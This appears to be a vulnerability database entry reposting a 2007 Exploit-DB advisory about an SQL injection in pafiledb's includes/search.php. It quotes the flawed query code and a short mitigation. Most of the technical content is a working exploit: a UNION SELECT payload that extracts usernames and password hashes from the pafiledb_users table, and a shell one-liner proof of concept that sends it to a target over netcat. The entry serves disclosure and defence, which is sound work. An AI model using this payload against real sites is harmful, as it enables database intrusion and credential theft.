SQL Injection in includes/search.php

vendor:

pafiledb

by:

h4si & pUm

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: pafiledb

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

SQL Injection in includes/search.php

The vulnerability exists in the includes/search.php file of the PHP Arena website. The code shown is susceptible to SQL injection, as it directly concatenates user input ($_POST['categories']) into the SQL query without proper sanitization. An attacker can exploit this vulnerability to execute arbitrary SQL commands and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to properly sanitize user input before incorporating it into SQL queries. Additionally, input validation and output encoding should be implemented to prevent cross-site scripting (XSS) attacks.

Source

Exploit-DB raw data:

Site: http://www.phparena.net/pafiledb
Description: SQL injection (categories) in includes/search.php
Code: $results = $db->GetArray("SELECT * FROM ".$dbPrefix."files WHERE (".$searchin.") AND file_catid IN (".implode(',',$_POST['categories']).")");

Comment:"ouuch"

SQL: ) UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users

POC:
host="www.example.com"; echo -e "POST
http://$host/index.php?act=search&process HTTP/1.1\nHost:
$host\nContent-Length:
302\n\nquery=test&search_in[]=file_name&search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1)
UNION SELECT ALL
null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
FROM (pafiledb_users"| netcat $host 80

Vendor: was informed, but did not response yet...
credits: h4si & pUm

# milw0rm.com [2007-07-14]